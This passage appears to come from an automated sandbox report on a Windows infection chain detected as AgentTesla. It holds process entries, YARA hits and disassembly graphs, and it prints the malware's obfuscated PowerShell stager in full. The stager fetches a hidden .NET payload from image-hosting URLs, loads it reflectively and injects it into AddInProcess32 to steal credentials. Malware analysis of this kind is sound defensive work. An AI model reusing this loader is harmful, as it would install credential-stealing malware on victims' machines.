gTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreG8DgTrecgBiDgTreG8DgTreeQDgTrevDgTreDQDgTreNQDgTrexDgTreC4DgTreMwDgTre0DgTreDIDgTreLgDgTrezDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:06:54:08
                                                                                  Start date:24/04/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:06:54:09
                                                                                  Start date:24/04/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:06:54:17
                                                                                  Start date:24/04/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                  Imagebase:0x6b0000
                                                                                  File size:43'008 bytes
                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2973300391.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Reset < >
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2191011959.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b810000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                    • Instruction ID: ff196af375a94f47ba03b57bc24693da6d6d2f26b28dbe7f82b8111ea46ca80b
                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                    • Instruction Fuzzy Hash: 1801AC7010CB0D4FD744DF0CD051AA5B3E0FB95320F10056DE58AC3551D632E882C741
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:7.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:60%
                                                                                    Total number of Nodes:5
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 25176 e17068 25177 e170ac CheckRemoteDebuggerPresent 25176->25177 25178 e170ee 25177->25178 25179 625aac8 DuplicateHandle 25180 625ab5e 25179->25180

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 528 62512d8-62512f9 529 62512fb-62512fe 528->529 530 6251304-6251323 529->530 531 6251a9f-6251aa2 529->531 540 6251325-6251328 530->540 541 625133c-6251346 530->541 532 6251aa4-6251ac3 531->532 533 6251ac8-6251aca 531->533 532->533 535 6251ad1-6251ad4 533->535 536 6251acc 533->536 535->529 537 6251ada-6251ae3 535->537 536->535 540->541 543 625132a-625133a 540->543 545 625134c-625135b 541->545 543->545 654 625135d call 6251af1 545->654 655 625135d call 6251af8 545->655 547 6251362-6251367 548 6251374-6251651 547->548 549 6251369-625136f 547->549 570 6251657-6251706 548->570 571 6251a91-6251a9e 548->571 549->537 580 625172f 570->580 581 6251708-625172d 570->581 583 6251738-625174b 580->583 581->583 585 6251751-6251773 583->585 586 6251a78-6251a84 583->586 585->586 589 6251779-6251783 585->589 586->570 587 6251a8a 586->587 587->571 589->586 590 6251789-6251794 589->590 590->586 591 625179a-6251870 590->591 603 6251872-6251874 591->603 604 625187e-62518ae 591->604 603->604 608 62518b0-62518b2 604->608 609 62518bc-62518c8 604->609 608->609 610 6251928-625192c 609->610 611 62518ca-62518ce 609->611 612 6251932-625196e 610->612 613 6251a69-6251a72 610->613 611->610 614 62518d0-62518fa 611->614 624 6251970-6251972 612->624 625 625197c-625198a 612->625 613->586 613->591 621 62518fc-62518fe 614->621 622 6251908-6251925 614->622 621->622 622->610 624->625 628 62519a1-62519ac 625->628 629 625198c-6251997 625->629 632 62519c4-62519d5 628->632 633 62519ae-62519b4 628->633 629->628 634 6251999 629->634 638 62519d7-62519dd 632->638 639 62519ed-62519f9 632->639 635 62519b6 633->635 636 62519b8-62519ba 633->636 634->628 635->632 636->632 640 62519e1-62519e3 638->640 641 62519df 638->641 643 6251a11-6251a62 639->643 644 62519fb-6251a01 639->644 640->639 641->639 643->613 645 6251a05-6251a07 644->645 646 6251a03 644->646 645->643 646->643 654->547 655->547
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2987996861.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_6250000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                    • API String ID: 0-2392861976
                                                                                    • Opcode ID: 16f2b5507e29c11db284886a9d76980cf9d87e3e0b5146eaaed9ebbc8d5bb60a
                                                                                    • Instruction ID: e27c8b9e38adbe3d7067b43c94b94570fa144b50b6a2ffdc3a322dc2d81c10d6
                                                                                    • Opcode Fuzzy Hash: 16f2b5507e29c11db284886a9d76980cf9d87e3e0b5146eaaed9ebbc8d5bb60a
                                                                                    • Instruction Fuzzy Hash: 29322D31E1071ACFCB15EF74C85469DB7B6FF99300F21C6A9D809AB254EB30A985CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 722 6253c30-6253c4e 723 6253c50-6253c53 722->723 724 6253c55-6253c5f 723->724 725 6253c60-6253c63 723->725 726 6253c65-6253c7f 725->726 727 6253c84-6253c87 725->727 726->727 728 6253c9e-6253ca1 727->728 729 6253c89-6253c97 727->729 730 6253cc4-6253cc6 728->730 731 6253ca3-6253cbf 728->731 737 6253cd6-6253cec 729->737 738 6253c99 729->738 734 6253ccd-6253cd0 730->734 735 6253cc8 730->735 731->730 734->723 734->737 735->734 742 6253cf2-6253cfb 737->742 743 6253f08-6253f12 737->743 738->728 744 6253d01-6253d1e 742->744 745 6253f13-6253f4f 742->745 752 6253ef5-6253f02 744->752 753 6253d24-6253d4c 744->753 748 6253f51-6253f54 745->748 750 6253f77-6253f7a 748->750 751 6253f56-6253f72 748->751 754 6254027-625402a 750->754 755 6253f80-6253f8c 750->755 751->750 752->742 752->743 753->752 776 6253d52-6253d5b 753->776 756 6254260-6254262 754->756 757 6254030-625403f 754->757 759 6253f97-6253f99 755->759 761 6254264 756->761 762 6254269-625426c 756->762 772 6254041-625405c 757->772 773 625405e-62540a2 757->773 763 6253fb1-6253fb5 759->763 764 6253f9b-6253fa1 759->764 761->762 762->748 767 6254272-625427b 762->767 770 6253fb7-6253fc1 763->770 771 6253fc3 763->771 768 6253fa5-6253fa7 764->768 769 6253fa3 764->769 768->763 769->763 775 6253fc8-6253fca 770->775 771->775 772->773 782 6254234-625424a 773->782 783 62540a8-62540b9 773->783 778 6253fe1-625401a 775->778 779 6253fcc-6253fcf 775->779 776->745 781 6253d61-6253d7d 776->781 778->757 803 625401c-6254026 778->803 779->767 788 6253ee3-6253eef 781->788 789 6253d83-6253dad call 6250f70 781->789 782->756 792 625421f-625422e 783->792 793 62540bf-62540dc 783->793 788->752 788->776 806 6253db3-6253ddb 789->806 807 6253ed9-6253ede 789->807 792->782 792->783 793->792 805 62540e2-62541d9 793->805 854 62541e7 805->854 855 62541db-62541e5 805->855 806->807 814 6253de1-6253e0f 806->814 807->788 814->807 819 6253e15-6253e1e 814->819 819->807 820 6253e24-6253e56 819->820 828 6253e61-6253e7d 820->828 829 6253e58-6253e5c 820->829 828->788 831 6253e7f-6253ed7 828->831 829->807 830 6253e5e 829->830 830->828 831->788 856 62541ec-62541ee 854->856 855->856 856->792 857 62541f0-62541f5 856->857 858 62541f7-6254201 857->858 859 6254203 857->859 860 6254208-625420a 858->860 859->860 860->792 861 625420c-6254218 860->861 861->792
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2987996861.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_6250000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $^q$$^q
                                                                                    • API String ID: 0-355816377
                                                                                    • Opcode ID: 442aa9ac22abeb84e631e2dfab3c832b3811f4e1fa3b3bc608e0b8d901d083ad
                                                                                    • Instruction ID: 6b62b35a8b29e86cddda7006dad929e616a10f4565abfe435379f157d1d8e62a
                                                                                    • Opcode Fuzzy Hash: 442aa9ac22abeb84e631e2dfab3c832b3811f4e1fa3b3bc608e0b8d901d083ad
                                                                                    • Instruction Fuzzy Hash: CD028C30B102169FDB64DF64D4946AEB7E2EF84344F158469EC0ADB395EB31EC86CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2970775377.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_e10000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d91cd529bca73ea61167cc177910d6a367bcbcdc2f912f621d152d123a0fcf04
                                                                                    • Instruction ID: 8d4cd6e2f0a91dfffc593060f5ead2a0ce67e72f60550bd321c72e9e9e27f2f9
                                                                                    • Opcode Fuzzy Hash: d91cd529bca73ea61167cc177910d6a367bcbcdc2f912f621d152d123a0fcf04
                                                                                    • Instruction Fuzzy Hash: 4053D531D10B1A8ADB51EB68C8806D9F7B1FF99300F55D79AE45877221EB70AAC4CF81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2970775377.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_e10000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c78899b20f78b20bfa66290b63d108e21dcb7427ce35326687f8fdd85a054fcc
                                                                                    • Instruction ID: 18f0acc51e3046b01e24f65c34a5f3b8d4335c071bb57234bb083e9ae772222a
                                                                                    • Opcode Fuzzy Hash: c78899b20f78b20bfa66290b63d108e21dcb7427ce35326687f8fdd85a054fcc
                                                                                    • Instruction Fuzzy Hash: 6E230C31D107198ECB11EB68C8906EDF7B1FF99300F15D69AE459B7221EB70AAC5CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1817 e17068-e170ec CheckRemoteDebuggerPresent 1819 e170f5-e17130 1817->1819 1820 e170ee-e170f4 1817->1820 1820->1819
                                                                                    APIs
                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E170DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2970775377.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_e10000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                    • String ID:
                                                                                    • API String ID: 3662101638-0
                                                                                    • Opcode ID: 4c2e69e61888e98c82c75757f3b85b53718a24dcd2372a215cf3fffd7c8655bf
                                                                                    • Instruction ID: 610b8ea39d3594454fa583b41df3bda08af9d28e0b611c6044b421630b013235
                                                                                    • Opcode Fuzzy Hash: 4c2e69e61888e98c82c75757f3b85b53718a24dcd2372a215cf3fffd7c8655bf
                                                                                    • Instruction Fuzzy Hash: 2E2125B18002598FCB10CF9AD884BEEFBF4AF49320F14845AE459A3291D778A944CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1918 e13e68-e13ece 1920 e13ed0-e13edb 1918->1920 1921 e13f18-e13f1a 1918->1921 1920->1921 1922 e13edd-e13ee9 1920->1922 1923 e13f1c-e13f74 1921->1923 1924 e13eeb-e13ef5 1922->1924 1925 e13f0c-e13f16 1922->1925 1932 e13f76-e13f81 1923->1932 1933 e13fbe-e13fc0 1923->1933 1926 e13ef7 1924->1926 1927 e13ef9-e13f08 1924->1927 1925->1923 1926->1927 1927->1927 1929 e13f0a 1927->1929 1929->1925 1932->1933 1934 e13f83-e13f8f 1932->1934 1935 e13fc2-e13fda 1933->1935 1936 e13f91-e13f9b 1934->1936 1937 e13fb2-e13fbc 1934->1937 1942 e14024-e14026 1935->1942 1943 e13fdc-e13fe7 1935->1943 1938 e13f9d 1936->1938 1939 e13f9f-e13fae 1936->1939 1937->1935 1938->1939 1939->1939 1941 e13fb0 1939->1941 1941->1937 1945 e14028-e14076 1942->1945 1943->1942 1944 e13fe9-e13ff5 1943->1944 1946 e13ff7-e14001 1944->1946 1947 e14018-e14022 1944->1947 1953 e1407c-e1408a 1945->1953 1948 e14003 1946->1948 1949 e14005-e14014 1946->1949 1947->1945 1948->1949 1949->1949 1951 e14016 1949->1951 1951->1947 1954 e14093-e140f3 1953->1954 1955 e1408c-e14092 1953->1955 1962 e14103-e14107 1954->1962 1963 e140f5-e140f9 1954->1963 1955->1954 1965 e14117-e1411b 1962->1965 1966 e14109-e1410d 1962->1966 1963->1962 1964 e140fb 1963->1964 1964->1962 1968 e1412b-e1412f 1965->1968 1969 e1411d-e14121 1965->1969 1966->1965 1967 e1410f-e14112 call e10ab8 1966->1967 1967->1965 1972 e14131-e14135 1968->1972 1973 e1413f-e14143 1968->1973 1969->1968 1971 e14123-e14126 call e10ab8 1969->1971 1971->1968 1972->1973 1975 e14137-e1413a call e10ab8 1972->1975 1976 e14153-e14157 1973->1976 1977 e14145-e14149 1973->1977 1975->1973 1980 e14167 1976->1980 1981 e14159-e1415d 1976->1981 1977->1976 1979 e1414b 1977->1979 1979->1976 1983 e14168 1980->1983 1981->1980 1982 e1415f 1981->1982 1982->1980 1983->1983
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2970775377.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_e10000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V^o
                                                                                    • API String ID: 0-832254231
                                                                                    • Opcode ID: 4ee88cfb8f3560a0e8bbffad892c4fd506422aa6786c36bd1a62e9cf4b87084b
                                                                                    • Instruction ID: 7b5f7828f03c11b5c7a308871a7e49e41b571cbd69126aa406363987f55ddb2d
                                                                                    • Opcode Fuzzy Hash: 4ee88cfb8f3560a0e8bbffad892c4fd506422aa6786c36bd1a62e9cf4b87084b
                                                                                    • Instruction Fuzzy Hash: 86913DB0E002099FDF14CFA9D9857DEBBF2AF88314F149129E415B7394EB749986CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2970775377.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_e10000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4dac8af20f124e88406be2010f9abde14b31dcafaa2d1eae480f6a60c5a10d3d
                                                                                    • Instruction ID: 1cf6e6e9c027d3f738e91bf6eb0fb00c2527f26fcdc3c71a2b24cb235ffa4835
                                                                                    • Opcode Fuzzy Hash: 4dac8af20f124e88406be2010f9abde14b31dcafaa2d1eae480f6a60c5a10d3d
                                                                                    • Instruction Fuzzy Hash: 8EB15CB0E042098FDF14CFA9D885BDDBBF2AF88718F149529D419B7394EB749885CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1811 e17060-e170ec CheckRemoteDebuggerPresent 1813 e170f5-e17130 1811->1813 1814 e170ee-e170f4 1811->1814 1814->1813
                                                                                    APIs
                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E170DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2970775377.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_e10000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                    • String ID:
                                                                                    • API String ID: 3662101638-0
                                                                                    • Opcode ID: 0deb46b5f0b76eac4ce065f23dbf123e0228877dc3eda6f277c9d2721d0bc37d
                                                                                    • Instruction ID: 3ab680ca2cd94eb630b7f7ed2af7477d3f981a71ce1adf6646af8ecedb6ac39e
                                                                                    • Opcode Fuzzy Hash: 0deb46b5f0b76eac4ce065f23dbf123e0228877dc3eda6f277c9d2721d0bc37d
                                                                                    • Instruction Fuzzy Hash: F92116B18003598FCB14CF99D844BEEFBF4AF49320F15845AE459A3291D7789944CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1823 625aac0-625ab5c DuplicateHandle 1824 625ab65-625ab82 1823->1824 1825 625ab5e-625ab64 1823->1825 1825->1824
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0625AB4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2987996861.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
